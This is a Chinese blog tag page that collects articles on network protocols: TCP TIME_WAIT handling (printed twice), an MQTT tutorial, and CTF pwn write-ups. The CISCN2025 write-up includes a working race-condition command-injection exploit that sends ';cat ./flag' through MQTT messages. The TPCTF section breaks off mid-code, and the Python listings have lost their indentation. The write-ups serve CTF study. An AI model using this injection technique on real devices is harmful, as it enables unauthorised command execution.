标签 网络协议 下的文章

放在的 NotebookLM

TrustTunnel 是由 AdGuard VPN 开发的一款现代化开源网络协议,其核心目标是通过将 VPN 流量伪装成标准 HTTPS 数据 来规避深度包检测。该项目由服务端、命令行客户端以及基于 Flutter 的图形界面应用组成,支持 HTTP/2 和 QUIC 等多种传输协议。技术文档详细说明了其对 TCP、UDP 及 ICMP 流量的多路复用处理方式,并提供了跨平台的系统级隧道与代理模式。此外,该系统集成了 自动证书管理、分流控制以及 Kill Switch 等安全特性,确保连接的机密性与稳定性。开发者可以通过 Rust 环境进行构建,而用户则能利用自动配置向导在多种操作系统上完成快速部署。


📌 转载信息
原作者:
michaol
转载时间:
2026/1/24 16:04:23

今天来讲一讲TCP 的 TIME_WAIT 的问题。这个问题尽人皆知,不过,这次遇到的是不太一样的场景,前两天也解决了,正好写篇文章,顺便把 TIME_WAIT 的那些事都说一说。对了,这个场景,跟我开源的探活小工具 EaseProbe 有关,我先说说这个场景里的问题,然后,顺着这个场景跟大家好好说一下这个事。

目录

问题背景

先说一下背景,EaseProbe 是一个轻量独立的用来探活服务健康状况的小工具,支持http/tcp/shell/ssh/tls/host以及各种中间件的探活,然后,直接发送通知到主流的IM上,如:Slack/Telegram/Discrod/Email/Team,包括国内的企业微信/钉钉/飞书, 非常好用,用过的人都说好 😏。

这个探活工具在每次探活的时候,必须要从头开始建立整个网络链接,也就是说,需要从头开始进行DNS查询,建立TCP链接,然后进行通信,再关闭链接。这里,我们不会设置 TCP 的 KeepAlive 重用链接,因为探活工具除了要探活所远端的服务,还要探活整个网络的情况,所以,每次探活都需要从新来过,这样才能捕捉得到整个链路的情况。

但是,这样不断的新建链接和关闭链接,根据TCP的状态机,我们知道这会导致在探测端这边出现的 TIME_WAIT 的 TCP 链接,根据 TCP 协议的定义,这个 TIME_WAIT 需要等待 2倍的MSL 时间,TCP 链接都会被系统回收,在回收之前,这个链接会占用系统的资源,主要是两个资源,一个是文件描述符,这个还好,可以调整,另一个则是端口号,这个是没法调整的,因为作为发起请求的client来说,在对同一个IP上理论上你只有64K的端口号号可用(实际上系统默认只有近30K,从32,768 到 60,999 一共 60999+1-32768=28,232,你可以通过 sysctl net.ipv4.ip_local_port_range 查看  ),如果 TIME_WAIT 过多,会导致TCP无法建立链接,还会因为资源消耗太多导致整个程序甚至整个系统异常。

试想,如果我们以 10秒为周期探测10K的结点,如果TIME_WAIT的超时时间是120秒,那么在第60秒后,等着超时的 TIME_WAIT 我们就有可能把某个IP的端口基本用完了,就算还行,系统也有些问题。(注意:我们不仅仅只是TCP,还有HTTP协议,所以,大家不要觉得TCP的四元组只要目标地址不一样就好了,一方面,我们探的是域名,需要访问DNS服务,所以,DNS服务一般是一台服务器,还有,因为HTTPS一般是探API,而且会有网关代理API,所以链接会到同一个网关上。另外就算还可以建出站连接,但是本地程序会因为端口耗尽无法bind了。所以,现实情况并不会像理论情况那样只要四元组不冲突,端口就不会耗尽)

为什么要 TIME_WAIT

那么,为什么TCP在 TIME_WAIT 上要等待一个2MSL的时间?

以前写过篇比较宏观的《TCP的那些事》(上篇下篇),这个访问在“上篇”里讲过,这里再说一次,TCP 断链接的时候,会有下面这个来来回回的过程。

我们来看主动断链接的最后一个状态 TIME_WAIT 后就不需要等待对端回 ack了,而是进入了超时状态。这主要是因为,在网络上,如果要知道我们发出的数据被对方收到了,那我们就需要对方发来一个确认的Ack信息,那问题来了,对方怎么知道自己发出去的ack,被收到了?难道还要再ack一下,这样ack来ack回的,那什么谁也不要玩了……是的,这就是比较著名的【两将军问题】——两个将军需要在一个不稳定的信道上达成对敌攻击时间的协商,A向B派出信鸽,我们明早8点进攻,A怎么知道B收到了信?那需要B向A派出信鸽,ack说我收到了,明早8点开干。但是,B怎么知道A会收到自己的确认信?是不是还要A再确认一下?这样无穷无尽的确认导致这个问题是没有完美解的(我们在《分布式事务》一文中说过这个问题,这里不再重述)

所以,我们只能等一个我们认为最大小时来解决两件个问题:

1) 为了 防止来自一个连接的延迟段被依赖于相同四元组(源地址、源端口、目标地址、目标端口)的稍后连接接受(被接受后,就会被马上断掉,TCP状态机紊乱)。虽然,可以通过指定 TCP 的 sequence number 一定范围内才能被接受。但这也只是让问题发生的概率低了一些,对于一个吞吐量大的的应用来说,依然能够出现问题,尤其是在具有大接收窗口的快速连接上。RFC 1337详细解释了当 TIME-WAIT状态不足时会发生什么。TIME-WAIT以下是如果不缩短状态可以避免的示例:

由于缩短的 TIME-WAIT 状态,后续的 TCP 段已在不相关的连接中被接受(来源

 

2)另一个目的是确保远端已经关闭了连接。当最后一个ACK​​ 丢失时,对端保持该LAST-ACK状态。在没有TIME-WAIT状态的情况下,可以重新打开连接,而远程端仍然认为先前的连接有效。当它收到一个SYN段(并且序列号匹配)时,它将以RST应答,因为它不期望这样的段。新连接将因错误而中止:

 

如果远端因为最后一个 ACK​​ 丢失而停留在 LAST-ACK 状态,则打开具有相同四元组的新连接将不起作用 (来源

TIME_WAIT 的这个超时时间的值如下所示:

  • 在 macOS 上是15秒, sysctl net.inet.tcp | grep net.inet.tcp.msl
  • 在 Linux 上是 60秒 cat /proc/sys/net/ipv4/tcp_fin_timeout

解决方案

要解决这个问题,网上一般会有下面这些解法

  • 把这个超时间调小一些,这样就可以把TCP 的端口号回收的快一些。但是也不能太小,如果流量很大的话,TIME_WAIT一样会被耗尽。
  • 设置上 tcp_tw_reuse 。RFC 1323提出了一组 TCP 扩展来提高高带宽路径的性能。除其他外,它定义了一个新的 TCP 选项,带有两个四字节时间戳字段。第一个是发送选项的 TCP 时间戳的当前值,而第二个是从远程主机接收到的最新时间戳。如果新时间戳严格大于为前一个连接记录的最新时间戳。Linux 将重用该状态下的现有 TIME_WAIT 连接用于出站的链接。也就是说,这个参数对于入站连接是没有任何用图的。
  • 设置上 tcp_tw_recycle 。 这个参数同样依赖于时间戳选项,但会影响进站和出站链接。这个参数会影响NAT环境,也就是一个公司里的所有员工用一个IP地址访问外网的情况。在这种情况下,时间戳条件将禁止在这个公网IP后面的所有设备在一分钟内连接,因为它们不共享相同的时间戳时钟。毫无疑问,禁用此选项要好得多,因为它会导致 难以检测诊断问题。(注:从 Linux 4.10 (commit 95a22caee396 ) 开始,Linux 将为每个连接随机化时间戳偏移量,从而使该选项完全失效,无论有无NAT。它已从 Linux 4.12中完全删除)

对于服务器来说,上述的三个访问都不能解决服务器的 TIME_WAIT 过多的问题,真正解决问题的就是——不作死就不会死,也就是说,服务器不要主动断链接,而设置上KeepAlive后,让客户端主动断链接,这样服务端只会有CLOSE_WAIT

但是对于用于建立出站连接的探活的 EaseProbe来说,设置上 tcp_tw_reuse 就可以重用 TIME_WAIT 了,但是这依然无法解决 TIME_WAIT 过多的问题。

然后,过了几天后,我忽然想起来以前在《UNIX 网络编程》上有看到过一个Socket的参数,叫 <code>SO_LINGER,我的编程生涯中从来没有使用过这个设置,这个参数主要是为了延尽关闭来用的,也就是说你应用调用 close()函数时,如果还有数据没有发送完成,则需要等一个延时时间来让数据发完,但是,如果你把延时设置为 0  时,Socket就丢弃数据,并向对方发送一个 RST 来终止连接,因为走的是 RST 包,所以就不会有 TIME_WAIT 了。

这个东西在服务器端永远不要设置,不然,你的客户端就总是看到 TCP 链接错误 “connnection reset by peer”,但是这个参数对于 EaseProbe 的客户来说,简直是太完美了,当EaseProbe 探测完后,直接 reset connection, 即不会有功能上的问题,也不会影响服务器,更不会有烦人的 TIME_WAIT 问题。

Go 实际操作

在 Golang的标准库代码里,net.TCPConn 有个方法 SetLinger()可以完成这个事,使用起来也比较简单:

conn, _ := net.DialTimeout("tcp", t.Host, t.Timeout())

if tcpCon, ok := conn.(*net.TCPConn); ok {
    tcpCon.SetLinger(0)
}

你需要把一个 net.Conn  转型成 net.TCPConn,然后就可以调用方法了。

但是对于Golang 的标准库中的 HTTP 对象来说,就有点麻烦了,Golang的 http 库把底层的这边连接对象全都包装成私有变量了,你在外面根本获取不到。这篇《How to Set Go net/http Socket Options – setsockopt() example 》中给出了下面的方法:

dialer := &net.Dialer{
    Control: func(network, address string, conn syscall.RawConn) error {
        var operr error
        if err := conn.Control(func(fd uintptr) {
            operr = syscall.SetsockoptInt(int(fd), unix.SOL_SOCKET, unix.TCP_QUICKACK, 1)
        }); err != nil {
            return err
        }
        return operr
    },
}

client := &http.Client{
    Transport: &http.Transport{
        DialContext: dialer.DialContext,
    },
}

上面这个方法非常的低层,需要直接使用setsocketopt这样的系统调用,我其实,还是想使用 TCPConn.SetLinger(0) 来完成这个事,即然都被封装好了,最好还是别破坏封闭性碰底层的东西。

经过Golang http包的源码阅读和摸索,我使用了下面的方法:

client := &http.Client{
    Timeout: h.Timeout(),
    Transport: &http.Transport{
      TLSClientConfig:   tls,
      DisableKeepAlives: true,
      DialContext: func(ctx context.Context, network, addr string) (net.Conn, error) {
        d := net.Dialer{Timeout: h.Timeout()}
        conn, err := d.DialContext(ctx, network, addr)
        if err != nil {
          return nil, err
        }
        tcpConn, ok := conn.(*net.TCPConn)
        if ok {
          tcpConn.SetLinger(0)
          return tcpConn, nil
        }
        return conn, nil
      },
    },
  }

然后,我找来了全球 T0p 100W的域名,然后在AWS上开了一台服务器,用脚本生成了 TOP 10K 和 20K 的网站来以5s, 10s, 30s, 60s的间隔进行探活,搞到Cloudflare 的 1.1.1.1 DNS 时不时就把我拉黑,最后的测试结果也非常不错,根本 没有 TIME_WAIT 的链接,相关的测试方法、测试数据和测试报告可以参看:Benchmark Report

总结

下面是几点总结

  • TIME_WAIT 是一个TCP 协议完整性的手段,虽然会有一定的副作用,但是这个设计是非常关键的,最好不要妥协掉。
  • 永远不要使用  tcp_tw_recycle ,这个参数是个巨龙,破坏力极大。
  • 服务器端永远不要使用  SO_LINGER(0),而且使用 tcp_tw_reuse 对服务端意义不大,因为它只对出站流量有用。
  • 在服务端上最好不要主动断链接,设置好KeepAlive,重用链接,让客户端主动断链接。
  • 在客户端上可以使用 tcp_tw_reuse  和 SO_LINGER(0)

最后强烈推荐阅读这篇文章 – Coping with the TCP TIME-WAIT state on busy Linux servers

今天来讲一讲TCP 的 TIME_WAIT 的问题。这个问题尽人皆知,不过,这次遇到的是不太一样的场景,前两天也解决了,正好写篇文章,顺便把 TIME_WAIT 的那些事都说一说。对了,这个场景,跟我开源的探活小工具 EaseProbe 有关,我先说说这个场景里的问题,然后,顺着这个场景跟大家好好说一下这个事。

目录

问题背景

先说一下背景,EaseProbe 是一个轻量独立的用来探活服务健康状况的小工具,支持http/tcp/shell/ssh/tls/host以及各种中间件的探活,然后,直接发送通知到主流的IM上,如:Slack/Telegram/Discrod/Email/Team,包括国内的企业微信/钉钉/飞书, 非常好用,用过的人都说好 😏。

这个探活工具在每次探活的时候,必须要从头开始建立整个网络链接,也就是说,需要从头开始进行DNS查询,建立TCP链接,然后进行通信,再关闭链接。这里,我们不会设置 TCP 的 KeepAlive 重用链接,因为探活工具除了要探活所远端的服务,还要探活整个网络的情况,所以,每次探活都需要从新来过,这样才能捕捉得到整个链路的情况。

但是,这样不断的新建链接和关闭链接,根据TCP的状态机,我们知道这会导致在探测端这边出现的 TIME_WAIT 的 TCP 链接,根据 TCP 协议的定义,这个 TIME_WAIT 需要等待 2倍的MSL 时间,TCP 链接都会被系统回收,在回收之前,这个链接会占用系统的资源,主要是两个资源,一个是文件描述符,这个还好,可以调整,另一个则是端口号,这个是没法调整的,因为作为发起请求的client来说,在对同一个IP上理论上你只有64K的端口号号可用(实际上系统默认只有近30K,从32,768 到 60,999 一共 60999+1-32768=28,232,你可以通过 sysctl net.ipv4.ip_local_port_range 查看  ),如果 TIME_WAIT 过多,会导致TCP无法建立链接,还会因为资源消耗太多导致整个程序甚至整个系统异常。

试想,如果我们以 10秒为周期探测10K的结点,如果TIME_WAIT的超时时间是120秒,那么在第60秒后,等着超时的 TIME_WAIT 我们就有可能把某个IP的端口基本用完了,就算还行,系统也有些问题。(注意:我们不仅仅只是TCP,还有HTTP协议,所以,大家不要觉得TCP的四元组只要目标地址不一样就好了,一方面,我们探的是域名,需要访问DNS服务,所以,DNS服务一般是一台服务器,还有,因为HTTPS一般是探API,而且会有网关代理API,所以链接会到同一个网关上。另外就算还可以建出站连接,但是本地程序会因为端口耗尽无法bind了。所以,现实情况并不会像理论情况那样只要四元组不冲突,端口就不会耗尽)

为什么要 TIME_WAIT

那么,为什么TCP在 TIME_WAIT 上要等待一个2MSL的时间?

以前写过篇比较宏观的《TCP的那些事》(上篇下篇),这个访问在“上篇”里讲过,这里再说一次,TCP 断链接的时候,会有下面这个来来回回的过程。

我们来看主动断链接的最后一个状态 TIME_WAIT 后就不需要等待对端回 ack了,而是进入了超时状态。这主要是因为,在网络上,如果要知道我们发出的数据被对方收到了,那我们就需要对方发来一个确认的Ack信息,那问题来了,对方怎么知道自己发出去的ack,被收到了?难道还要再ack一下,这样ack来ack回的,那什么谁也不要玩了……是的,这就是比较著名的【两将军问题】——两个将军需要在一个不稳定的信道上达成对敌攻击时间的协商,A向B派出信鸽,我们明早8点进攻,A怎么知道B收到了信?那需要B向A派出信鸽,ack说我收到了,明早8点开干。但是,B怎么知道A会收到自己的确认信?是不是还要A再确认一下?这样无穷无尽的确认导致这个问题是没有完美解的(我们在《分布式事务》一文中说过这个问题,这里不再重述)

所以,我们只能等一个我们认为最大小时来解决两件个问题:

1) 为了 防止来自一个连接的延迟段被依赖于相同四元组(源地址、源端口、目标地址、目标端口)的稍后连接接受(被接受后,就会被马上断掉,TCP状态机紊乱)。虽然,可以通过指定 TCP 的 sequence number 一定范围内才能被接受。但这也只是让问题发生的概率低了一些,对于一个吞吐量大的的应用来说,依然能够出现问题,尤其是在具有大接收窗口的快速连接上。RFC 1337详细解释了当 TIME-WAIT状态不足时会发生什么。TIME-WAIT以下是如果不缩短状态可以避免的示例:

由于缩短的 TIME-WAIT 状态,后续的 TCP 段已在不相关的连接中被接受(来源

 

2)另一个目的是确保远端已经关闭了连接。当最后一个ACK​​ 丢失时,对端保持该LAST-ACK状态。在没有TIME-WAIT状态的情况下,可以重新打开连接,而远程端仍然认为先前的连接有效。当它收到一个SYN段(并且序列号匹配)时,它将以RST应答,因为它不期望这样的段。新连接将因错误而中止:

 

如果远端因为最后一个 ACK​​ 丢失而停留在 LAST-ACK 状态,则打开具有相同四元组的新连接将不起作用 (来源

TIME_WAIT 的这个超时时间的值如下所示:

  • 在 macOS 上是15秒, sysctl net.inet.tcp | grep net.inet.tcp.msl
  • 在 Linux 上是 60秒 cat /proc/sys/net/ipv4/tcp_fin_timeout

解决方案

要解决这个问题,网上一般会有下面这些解法

  • 把这个超时间调小一些,这样就可以把TCP 的端口号回收的快一些。但是也不能太小,如果流量很大的话,TIME_WAIT一样会被耗尽。
  • 设置上 tcp_tw_reuse 。RFC 1323提出了一组 TCP 扩展来提高高带宽路径的性能。除其他外,它定义了一个新的 TCP 选项,带有两个四字节时间戳字段。第一个是发送选项的 TCP 时间戳的当前值,而第二个是从远程主机接收到的最新时间戳。如果新时间戳严格大于为前一个连接记录的最新时间戳。Linux 将重用该状态下的现有 TIME_WAIT 连接用于出站的链接。也就是说,这个参数对于入站连接是没有任何用图的。
  • 设置上 tcp_tw_recycle 。 这个参数同样依赖于时间戳选项,但会影响进站和出站链接。这个参数会影响NAT环境,也就是一个公司里的所有员工用一个IP地址访问外网的情况。在这种情况下,时间戳条件将禁止在这个公网IP后面的所有设备在一分钟内连接,因为它们不共享相同的时间戳时钟。毫无疑问,禁用此选项要好得多,因为它会导致 难以检测诊断问题。(注:从 Linux 4.10 (commit 95a22caee396 ) 开始,Linux 将为每个连接随机化时间戳偏移量,从而使该选项完全失效,无论有无NAT。它已从 Linux 4.12中完全删除)

对于服务器来说,上述的三个访问都不能解决服务器的 TIME_WAIT 过多的问题,真正解决问题的就是——不作死就不会死,也就是说,服务器不要主动断链接,而设置上KeepAlive后,让客户端主动断链接,这样服务端只会有CLOSE_WAIT

但是对于用于建立出站连接的探活的 EaseProbe来说,设置上 tcp_tw_reuse 就可以重用 TIME_WAIT 了,但是这依然无法解决 TIME_WAIT 过多的问题。

然后,过了几天后,我忽然想起来以前在《UNIX 网络编程》上有看到过一个Socket的参数,叫 <code>SO_LINGER,我的编程生涯中从来没有使用过这个设置,这个参数主要是为了延尽关闭来用的,也就是说你应用调用 close()函数时,如果还有数据没有发送完成,则需要等一个延时时间来让数据发完,但是,如果你把延时设置为 0  时,Socket就丢弃数据,并向对方发送一个 RST 来终止连接,因为走的是 RST 包,所以就不会有 TIME_WAIT 了。

这个东西在服务器端永远不要设置,不然,你的客户端就总是看到 TCP 链接错误 “connnection reset by peer”,但是这个参数对于 EaseProbe 的客户来说,简直是太完美了,当EaseProbe 探测完后,直接 reset connection, 即不会有功能上的问题,也不会影响服务器,更不会有烦人的 TIME_WAIT 问题。

Go 实际操作

在 Golang的标准库代码里,net.TCPConn 有个方法 SetLinger()可以完成这个事,使用起来也比较简单:

conn, _ := net.DialTimeout("tcp", t.Host, t.Timeout())

if tcpCon, ok := conn.(*net.TCPConn); ok {
    tcpCon.SetLinger(0)
}

你需要把一个 net.Conn  转型成 net.TCPConn,然后就可以调用方法了。

但是对于Golang 的标准库中的 HTTP 对象来说,就有点麻烦了,Golang的 http 库把底层的这边连接对象全都包装成私有变量了,你在外面根本获取不到。这篇《How to Set Go net/http Socket Options – setsockopt() example 》中给出了下面的方法:

dialer := &net.Dialer{
    Control: func(network, address string, conn syscall.RawConn) error {
        var operr error
        if err := conn.Control(func(fd uintptr) {
            operr = syscall.SetsockoptInt(int(fd), unix.SOL_SOCKET, unix.TCP_QUICKACK, 1)
        }); err != nil {
            return err
        }
        return operr
    },
}

client := &http.Client{
    Transport: &http.Transport{
        DialContext: dialer.DialContext,
    },
}

上面这个方法非常的低层,需要直接使用setsocketopt这样的系统调用,我其实,还是想使用 TCPConn.SetLinger(0) 来完成这个事,即然都被封装好了,最好还是别破坏封闭性碰底层的东西。

经过Golang http包的源码阅读和摸索,我使用了下面的方法:

client := &http.Client{
    Timeout: h.Timeout(),
    Transport: &http.Transport{
      TLSClientConfig:   tls,
      DisableKeepAlives: true,
      DialContext: func(ctx context.Context, network, addr string) (net.Conn, error) {
        d := net.Dialer{Timeout: h.Timeout()}
        conn, err := d.DialContext(ctx, network, addr)
        if err != nil {
          return nil, err
        }
        tcpConn, ok := conn.(*net.TCPConn)
        if ok {
          tcpConn.SetLinger(0)
          return tcpConn, nil
        }
        return conn, nil
      },
    },
  }

然后,我找来了全球 T0p 100W的域名,然后在AWS上开了一台服务器,用脚本生成了 TOP 10K 和 20K 的网站来以5s, 10s, 30s, 60s的间隔进行探活,搞到Cloudflare 的 1.1.1.1 DNS 时不时就把我拉黑,最后的测试结果也非常不错,根本 没有 TIME_WAIT 的链接,相关的测试方法、测试数据和测试报告可以参看:Benchmark Report

总结

下面是几点总结

  • TIME_WAIT 是一个TCP 协议完整性的手段,虽然会有一定的副作用,但是这个设计是非常关键的,最好不要妥协掉。
  • 永远不要使用  tcp_tw_recycle ,这个参数是个巨龙,破坏力极大。
  • 服务器端永远不要使用  SO_LINGER(0),而且使用 tcp_tw_reuse 对服务端意义不大,因为它只对出站流量有用。
  • 在服务端上最好不要主动断链接,设置好KeepAlive,重用链接,让客户端主动断链接。
  • 在客户端上可以使用 tcp_tw_reuse  和 SO_LINGER(0)

最后强烈推荐阅读这篇文章 – Coping with the TCP TIME-WAIT state on busy Linux servers

MQTT讲解

MQTT(Message Queuing Telemetry Transport,消息队列遥测传输协议),是一种基于发布/订阅(publish/subscribe)模式的“轻量级”通讯协议,该协议构建于TCP/IP协议上,由IBM在1999年发布。

MQTT最大优点在于,用极少的代码和有限的带宽,为连接远程设备提供实时可靠的消息服务。

作为一种低开销、低带宽占用的即时通讯协议,使其在物联网、小型设备、移动应用等方面有较广泛的应用。

协议原理

实现MQTT协议需要客户端和服务器端通讯完成,在通讯过程中,MQTT协议中有三种身份:发布者(Publish)、代理(Broker)(服务器)、订阅者(Subscribe)。其中,消息的发布者和订阅者都是客户端,消息代理是服务器,消息发布者可以同时是订阅者。

MQTT传输的消息分为:主题(Topic)和负载(payload)两部分:

(1)Topic,可以理解为消息的类型,订阅者订阅(Subscribe)后,就会收到该主题的消息内容(payload);
(2)payload,可以理解为消息的内容,是指订阅者具体要使用的内容。

发布者 (Publisher)

功能: 负责产生数据和消息,并将这些指定topic的消息发送(发布/Publish)到 Broker。

代理/服务器(broker)

可以理解为提供 mqtt 服务的代理服务器 ,通俗一点来讲就是”邮局”或者说是”消息中转中心”,每个 client 之间的通信都必须通过 Broker 来进行。
简单来说,Broker就是一个中间人,负责管理所有客户端的连接,并确保消息能够从一个客户端安全、高效地传递到另一个或多个客户端。

订阅者(Subscribe)

功能: 负责接收它感兴趣的消息。它会提前告诉Broker它对哪个”主题”(Topic)的消息感兴趣(这个行为叫做订阅/Subscribe),就会接收订阅相同topic的client。

客户端Client

客户端可以充当发布者,也可以充当订阅者,也可以同时充当两个角色

Client 是指任何连接到 Broker 的设备或应用程序 ,可以理解为”寄信人”和”收信人”。在物联网场景中,一个 Client 可以是一个温度传感器、一个智能灯泡、一部手机上的App,或者是一个在服务器上运行的数据分析程序。

示意图

client1,2,3,4同时连接broker,client1,2,3订阅topic"diag" ,这时client4发送topic为"diag" msg="hello"给broker,broker会向同时订阅topic="diag"的client1,2,3发送这个消息

image.png

环境配置

1.使用安装 Mosquitto MQTT

sudo apt update
sudo apt install mosquitto mosquitto-clients

2.启动服务并设置开机自启

sudo systemctl enable mosquitto
sudo systemctl start mosquitto

3.配置conf

sudo vim /etc/mosquitto/mosquitto.conf

在文件中添加

listener 1883 #设置监听端口为 1883
allow_anonymous true  # 可选,允许匿名访问(默认)

摁“Esc”+“:wq”退出后终端输入

sudo systemctl restart mosquitto # 重启服务

image.png

netstat -lnvp查看一下,可以看到1883端口已经开始监听

image.png

下载mqttx

MQTTX Download

image.png

点击新建连接,我这里是wsl启动的,但是监听了所有ip的端口,所以ip直接填0.0.0.0

image.png

添加一个订阅

image.png

利用终端进行连接测试

终端输入

mosquitto_pub -h localhost -t testtopic -m "Hello MQTT"

可以看到在客户端已经收到了消息

image.png

终端输入

mosquitto_sub -h localhost -t testtopic

用来订阅这个消息,在客户端输入主题testtopic

image.png
发送之后,在客户端和终端界面均可以看到刚才发的消息

image.png

python使用mqtt

pip install paho-mqtt

发送端

# -*- coding: utf-8 -*-# -*- coding: utf-8 -*-

import paho.mqtt.client as mqtt
import time

def on_connect(client, userdata, flags, rc):
print("链接")
print("Connected with result code: " + str(rc))

def on_message(client, userdata, msg):
print("消息内容")
print(msg.topic + " " + str(msg.payload))

#   订阅回调
def on_subscribe(client, userdata, mid, granted_qos):
print("订阅")
print("On Subscribed: qos = %d" % granted_qos)
pass

#   取消订阅回调
def on_unsubscribe(client, userdata, mid, granted_qos):
print("取消订阅")
print("On unSubscribed: qos = %d" % granted_qos)
pass

#   发布消息回调
def on_publish(client, userdata, mid):
print("发布消息")
print("On onPublish: qos = %d" % mid)
pass

#   断开链接回调
def on_disconnect(client, userdata, rc):
print("断开链接")
print("Unexpected disconnection rc = " + str(rc))
pass

client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.on_disconnect = on_disconnect
client.on_unsubscribe = on_unsubscribe
client.on_subscribe = on_subscribe
client.connect('127.0.0.1', 1883, 600)  # 600为keepalive的时间间隔
while True:
client.publish(topic='testtopic', payload='amazing', qos=0, retain=False)
time.sleep(2)

image.png

image.png

接收端

# -*- coding: utf-8 -*-# -*- coding: utf-8 -*-

import paho.mqtt.client as mqtt
import time

def on_connect(client, userdata, flags, rc):
print("链接")
print("Connected with result code: " + str(rc))

def on_message(client, userdata, msg):
print("消息内容")
print(msg.topic + " " + str(msg.payload))

#   订阅回调
def on_subscribe(client, userdata, mid, granted_qos):
print("订阅")
print("On Subscribed: qos = %d" % granted_qos)
pass

#   取消订阅回调
def on_unsubscribe(client, userdata, mid, granted_qos):
print("取消订阅")
print("On unSubscribed: qos = %d" % granted_qos)
pass

#   发布消息回调
def on_publish(client, userdata, mid):
print("发布消息")
print("On onPublish: id = %d" % mid)
pass

#   断开链接回调
def on_disconnect(client, userdata, rc):
print("断开链接")
print("Unexpected disconnection rc = " + str(rc))
pass

client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message
client.on_publish = on_publish
client.on_disconnect = on_disconnect
client.on_unsubscribe = on_unsubscribe
client.on_subscribe = on_subscribe
client.connect('127.0.0.1', 1883, 600)  # 600为keepalive的时间间隔

client.subscribe('testtopic', qos=0)

client.loop_forever() # 保持连接

image.png

image.png

例题讲解

CISCN2025——final mqtt

题目分析

image.png

image.png

程序首先会读取两个文件,如果文件不存在则直接退出

所以首先需要创建两个文件

image.png

接着会创建一个mqtt客户端,但是这里要求broker的监听端口是9999,所以我们需要改一下端口,修改方式上文说过

image.png
成功启动服务

image.png

首先程序会在订阅的diag主题中接受auth,cmd,arg三个参数,而且arg参数存放在bss段上

image.png

在start_routine函数中,会首先进行一个认证

image.png

认证的逻辑就是将接收到的VIN码转成十六进制(其实就是在考察mqtt接受数据),不多赘述了

随后根据cmd值,可以调用set_vin命令

image.png

这里有一个很明显的命令注入,src就是我们刚才的arg参数

popen函数会执行s的命令,由于是“r”参数,所以他会将命令执行的结果传入管道,在fread的时候读到ptr+5的位置,然后利用mqttsend函数发送给broker

image.png

但是执行命令之前,会有一个check函数,这个函数不细看了,功能就是只允许命令中有数字或字母出现,这就导致命令注入无法输入符号而不成功

但是由于检查完之后到执行命令之前,子进程会执行一个sleep(2)的函数,于是在这个期间我们就可以再次发送消息,修改arg为命令注入的参数,这当然绕不过check的检查,但是在上一个子进程休眠两秒结束后,我们的命令已经被修改了,于是就可以执行命令注入了

exp

#! /usr/bin/python3
import random
from pwn import *
import time
import paho.mqtt.client as mqtt
import json
context(log_level = "debug",os = "linux",arch = "amd64")
pwnFile = "./pwn"
libcFile = "./libc.so.6"
ip = "127.0.0.1"
local = ""
local_port = 9999
port = 9999
elf = ELF(pwnFile)
libc = ELF(libcFile)

def publish(client,topic,auth,cmd,arg):
msg = {
"auth":auth,
"cmd":cmd,
"arg":arg
}
result = client.publish(topic = topic, payload = json.dumps(msg))
print(json.dumps(msg))
print(result)
return result

def on_connect(client, userdata, flags, rc):
client.subscribe("vehicle_diag")
client.subscribe("diag")
client.subscribe("#")  # 订阅所有
client.subscribe("diag/resp")
print("Connected with result code " + str(rc))

def on_subscribe(client,userdata,mid,granted_qos):
print("消息发送成功")

def on_message(client, userdata, msg):
message = msg.payload.decode()# Decode message payload
print(f"Received message on topic '{msg.topic}': {message}")
# try:
#     data = json.loads(message)  # 解析为字典
#     dest = data.get("vin")  # 获取vin字段
#     log.success("dest -> "+ dest)
# except json.JSONDecodeError:
#     print("JSON解析失败")
print(message)

def sum2hex(dest):
v3 = 0
for i in range(len(dest)):
v3 = (0x1f  * v3 +  ord(dest[i])) & 0xffffffff
log.success(f"sum2hex -> {v3:08x}")
return  f"{v3:08x}"

#gdb.attach(io,'b *$rebase(0x1EC0)')
topic = "diag"
client = mqtt.Client()

client.on_connect = on_connect
client.on_message = on_message
client.on_subscribe = on_subscribe
client.connect(host = "127.0.0.1",port = 9999,keepalive=10000)

auth = sum2hex("hahaha\n")#这里是你自己接收到的VIN码

publish(client,"diag",auth,"set_vin","111111111111")
sleep(0.5)
publish(client,"diag",auth,"set_vin",";cat ./flag")
publish(client,"diag",auth,"set_vin",";cat ./flag")
sleep(1)

client.loop_start()

打通截图

image.png

TPCTF——smart_door_lock

题目已开源TPCTF2025/pwn-smart-door-lock at main · tp-ctf/TPCTF2025 · GitHub

题目附件是抹了符号表的静态编译,总之如果让我来直接逆向这个程序,我能逆一年,所以仅从复现学习的角度,我们先来学习源码,在对应到IDA里逆向吧,不得不说抹了符号表确实给这个题增加了太多难度

本题exp学习自TPCTF 2025 Writeup by Nepnep

源码学习

main.cpp

image.png

main.cpp里核心就是调用了mqtt_lock这个函数,其他的都不重要,都是初始化和结束回收资源函数等等,我们不多关注了

door_lock.h

image.png

这里面首先定义了指纹结构体和门锁开关状态结构体,指纹结构体包含指纹信息,下一个指针(很明显是个链表),指纹的id和重试次数,门锁状态定义了开/关两种状态以及操作的时间戳。

image.png

其次定义了mqtt_lock函数(核心),以及其他一些mqtt回调函数,还有指纹链表(finger_list),以及本题的关键——logger这个文件,还有其他若干函数和参数,不多解释了,接下来的函数分析会提到

door_lock.cpp

image.png

这是一个处理json数据的辅助函数,在这个题中不涉及漏洞和核心逻辑,不多分析了

贴AI的解释

image.png

时间戳,不多说

image.png

大白话就是把输入的字符串形式的指纹数据提取成int数组

image.png

这里限制了指纹数据只能是数字,如果是其他的,比如字母,就会直接返回空指针,这里比较重要,后面要考,划重点

mqtt_lock::mqtt_lock(const char *id, const char *host, int port) : mosqpp::mosquittopp(id)
{
/* set connection */
int keepalive = 60;
tls_opts_set(1,"tlsv1",NULL);
tls_set("/etc/mosquitto/certs/ca.crt",NULL,NULL,NULL,NULL);
tls_insecure_set(true);
connect(host, port, keepalive);

/* inital session & token */
session_id = NULL;
auth_token = NULL;

/* set lock inital */
lock_door();
/* open logger create read write */
strcpy(log_file,"/etc/mosquitto/smart_lock.log");
logger = fopen(log_file, "w+");
if (logger == NULL) {
printf("Error opening file!\n");
exit(1);
}
int status = log("logger created:%s\n",log_file);

/* read fingers */
FILE* finger_file = fopen("/etc/mosquitto/fingers_credit","r");
if (finger_file == NULL) {
printf("Error opening file!\n");
exit(1);
}
char line[512];
fingers *finger_pos = NULL;
max_finger_id = 1;
while (fgets(line, sizeof(line), finger_file)) {
line[strcspn(line, "\n")] = 0;
struct fingers *new_finger = (struct fingers*)malloc(sizeof(struct fingers));
